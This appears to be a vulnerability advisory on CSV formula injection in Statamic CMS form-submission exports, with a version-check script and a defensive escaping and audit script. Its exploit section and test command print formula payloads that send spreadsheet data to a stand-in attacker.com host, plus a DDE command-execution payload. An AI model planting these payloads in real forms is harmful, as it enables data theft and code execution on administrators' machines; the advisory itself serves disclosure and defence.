How CVE-2026-44306 Works
Statamic CMS is a Laravel- and Git-powered content management system. Prior to versions 5.73.24 and 6.20.1, the application failed to properly neutralize formula elements in CSV exports of form submissions. The vulnerability stems from the way spreadsheet applications interpret certain leading characters (specifically =, +, -, and @) as the start of a formula or macro.
An unauthenticated front-end visitor can submit a form containing a value that begins with one of these trigger characters. For example, a malicious user could enter `=HYPERLINK("http://attacker.com/steal?data="&A1,"Click me")` or `=CMD|'/C calc'!A0` into a text field. This value is stored in the Statamic database as part of the form submission record.
When a Control Panel user later exports these submissions to CSV and opens the file in a spreadsheet application like Microsoft Excel, LibreOffice Calc, or Google Sheets, the application interprets the injected string as a live formula rather than as plain text. The formula then executes within the context of the spreadsheet software, potentially performing actions such as:
- Exfiltrating other data from the spreadsheet to an attacker-controlled server.
- Executing system commands (especially in older Excel versions with DDE or OLE exploits).
- Running malicious macros if the spreadsheet is saved in a format that supports them.
The exploitation occurs entirely on the end-user's machine; the Statamic server itself is not compromised. However, the Control Panel user opening the export is the one whose environment is at risk. Because form submissions can come from anonymous visitors, an attacker can inject the payload without any authentication or prior access to the CMS.
The vulnerability is classified as a CSV injection (also known as formula injection or spreadsheet injection). It is documented under CWE-1236: Improper Neutralization of Formula Elements in a CSV File. The issue was addressed in versions 5.73.24 and 6.20.1 by escaping formula trigger characters during CSV export generation.
DailyCVE Form
- Platform: Statamic CMS
- Version: < 5.73.24, < 6.20.1
- Vulnerability: CSV Formula Injection
- Severity: Moderate
- Date: 2026-06-03
- Prediction: 2026-06-26 (already patched)
What Undercode Say: Analytics
The vulnerability allows unauthenticated attackers to inject formulas via form fields. The following bash command can be used to test for the presence of the vulnerability by simulating a malicious form submission:
curl -X POST https://target.com/!/forms/contact -d "name=test" -d "[email protected]" -d "message==HYPERLINK(\"http://attacker.com/steal?data=\"&A1,\"Click me\")"
To check if your Statamic installation is vulnerable, inspect the CSV export generation logic. Look for the absence of escaping in the `statamic/cms` package. The following Composer command will show the currently installed version:
composer show statamic/cms | grep versions
If the version is below 5.73.24 (for v5) or 6.20.1 (for v6), the installation is vulnerable.
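The version check above can be automated for an inventory of sites. The following script is an added example (not Statamic's tooling and not part of the original post): it reads the installed `statamic/cms` version out of a composer.lock document instead of calling `composer show`, and applies the two fixed-version thresholds the advisory names. The lock fragment at the bottom is constructed for the demonstration.

```python
import json
from typing import Optional

# Fixed releases named in the advisory, one per affected major line.
FIXED_5 = (5, 73, 24)
FIXED_6 = (6, 20, 1)


def parse_version(version: str) -> tuple:
    """Turn 'v6.19.3', '6.19.3' or '6.19.3-beta.1' into a comparable tuple.

    Pre-release and build suffixes are dropped, which is good enough for an
    inventory check (a 6.20.1-beta would compare as 6.20.1 here).
    """
    core = version.lstrip("v").split("-", 1)[0].split("+", 1)[0]
    return tuple(int(part) for part in core.split("."))


def is_vulnerable(version: str) -> bool:
    """Apply the advisory's ranges: anything below 5.73.24 on the 5.x line
    (or older), or below 6.20.1 on the 6.x line. Later majors are treated
    as outside the advisory."""
    parsed = parse_version(version)
    if parsed[0] <= 5:
        return parsed < FIXED_5
    if parsed[0] == 6:
        return parsed < FIXED_6
    return False


def statamic_version_from_lock(lock_json: str) -> Optional[str]:
    """Pull the installed statamic/cms version out of a composer.lock document."""
    data = json.loads(lock_json)
    for package in data.get("packages", []):
        if package.get("name") == "statamic/cms":
            return package.get("version")
    return None


# Constructed composer.lock fragment (not taken from any real project).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v11.0.0"},
        {"name": "statamic/cms", "version": "v6.19.3"},
    ]
})

if __name__ == "__main__":
    installed = statamic_version_from_lock(SAMPLE_LOCK)
    status = "vulnerable" if installed and is_vulnerable(installed) else "not in affected range"
    print(installed, status)
```

Run it against a real project by replacing `SAMPLE_LOCK` with the contents of that project's composer.lock; a missing `statamic/cms` entry returns `None`, which the caller should treat as "unknown" rather than "safe".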
Exploit
An attacker can exploit this vulnerability by submitting a form with a payload in any field that will be included in the CSV export. For example:
- Payload: `=HYPERLINK("http://attacker.com/log?data="&A1,"View Details")`
- Result: When an admin opens the CSV, the spreadsheet will attempt to fetch the URL, potentially leaking the contents of cell A1 (which may contain other sensitive submission data) to the attacker's server.
More dangerous payloads can leverage older Excel features:
- Payload: `=CMD|'/C calc'!A0` (executes calculator on Windows)
- Payload: `=EXEC("curl http://attacker.com/exfil?data="&A1)` (if Excel macros are enabled)
Protection
- Upgrade Statamic to version 5.73.24 or 6.20.1 or later. These versions escape formula trigger characters (=, +, -, @) by prefixing them with a single quote (') or tab character, preventing spreadsheet applications from interpreting them as formulas.
- If upgrading is not immediately possible, implement a temporary workaround by sanitizing form submissions before they are stored. Add a middleware or event listener that scans all incoming form data and escapes or rejects values starting with formula trigger characters.
- Educate Control Panel users to avoid opening CSV exports directly in spreadsheet applications. Instead, they should import the CSV using the “Text Import” wizard and explicitly mark all columns as “Text” to prevent formula evaluation.
- Use the `League\Csv\EscapeFormula` formatter if you are generating CSV files programmatically. This library automatically escapes formula characters in accordance with OWASP recommendations.
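The following script is an added example written for this page (it is not Statamic's export code and not the `League\Csv\EscapeFormula` formatter). It ties together the mechanism described in "How CVE-2026-44306 Works" and the first two protections above: `export_submissions(escape=False)` reproduces the pre-fix behaviour of writing raw values, `escape_formula_cell` applies the single-quote (or tab) prefix to cells that start with a trigger character, and `audit_csv` scans an existing export and lists every cell a spreadsheet would evaluate, which is the check to run on exports produced before the upgrade. The submissions and the `example.invalid` host are constructed sample data.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets read as
# the start of a formula (CWE-1236). A leading tab or carriage return is
# treated as risky too, since some importers strip it and then hit a trigger.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
RISKY_LEADING = FORMULA_TRIGGERS + ("\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return value.startswith(RISKY_LEADING)


def escape_formula_cell(value: str, prefix: str = "'") -> str:
    """Neutralise a cell that would otherwise be parsed as a formula.

    Only cells that start with a risky character are touched, so ordinary
    names and messages are exported unchanged. Pass prefix="\\t" for the
    tab variant mentioned in the advisory.
    """
    if is_formula_cell(value):
        return prefix + value
    return value


def export_submissions(rows, fields, escape=True) -> str:
    """Render form submissions as CSV text.

    escape=False reproduces the pre-fix behaviour (raw values); escape=True
    is the hardened export. QUOTE_ALL plus the csv module's doubled quotes
    also stop an embedded '","' from splitting one value into two cells.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {f: str(row.get(f, "")) for f in fields}
        if escape:
            cells = {f: escape_formula_cell(v) for f, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def audit_csv(text: str):
    """List (row, column, value) for every cell an existing export would
    evaluate as a formula; useful for checking exports made before the fix."""
    reader = csv.DictReader(io.StringIO(text))
    findings = []
    for row_no, row in enumerate(reader, start=2):  # row 1 is the header
        for column, value in row.items():
            if value is not None and is_formula_cell(value):
                findings.append((row_no, column, value))
    return findings


# Constructed sample submissions (not real data): one benign, one carrying
# the kind of payload the advisory describes, one with a legitimate leading "-".
FIELDS = ["name", "email", "message"]
SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.invalid", "message": "Hello, thanks!"},
    {"name": '=HYPERLINK("https://example.invalid/?d="&A1,"Click me")',
     "email": "x@example.invalid", "message": "@SUM(1+1)"},
    {"name": "Bob", "email": "bob@example.invalid", "message": '-1 star, "quoted" text'},
]

if __name__ == "__main__":
    raw = export_submissions(SUBMISSIONS, FIELDS, escape=False)
    hardened = export_submissions(SUBMISSIONS, FIELDS, escape=True)
    print("cells at risk in raw export:", audit_csv(raw))
    print("cells at risk in hardened export:", audit_csv(hardened))
    print(hardened)
```

Two design points worth noting. The prefix is applied to every cell that starts with a trigger character, so Bob's legitimate "-1 star" review is also escaped; that is the accepted trade-off of the OWASP approach, and the alternative is to type genuinely numeric columns as numbers rather than strings before export. And escaping on export is the right layer: rejecting or rewriting submissions at intake (the interim workaround) protects the CSV but also alters what visitors actually wrote, so it should be a stopgap until the patched export is in place.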
Impact
- Confidentiality: An attacker could exfiltrate other submission data or even the entire spreadsheet content via external hyperlink requests.
- Integrity: Malicious formulas could modify the spreadsheet or, in extreme cases, the local file system if the spreadsheet application has sufficient permissions.
- Availability: No direct impact on the Statamic server; the risk is confined to the Control Panel user’s workstation.
- Scope: The vulnerability affects all Statamic installations that allow unauthenticated form submissions and have Control Panel users who export submissions to CSV. The risk is heightened in environments where administrators use older, less secure spreadsheet software or have macros enabled by default.
Sources:
Reported By: github.com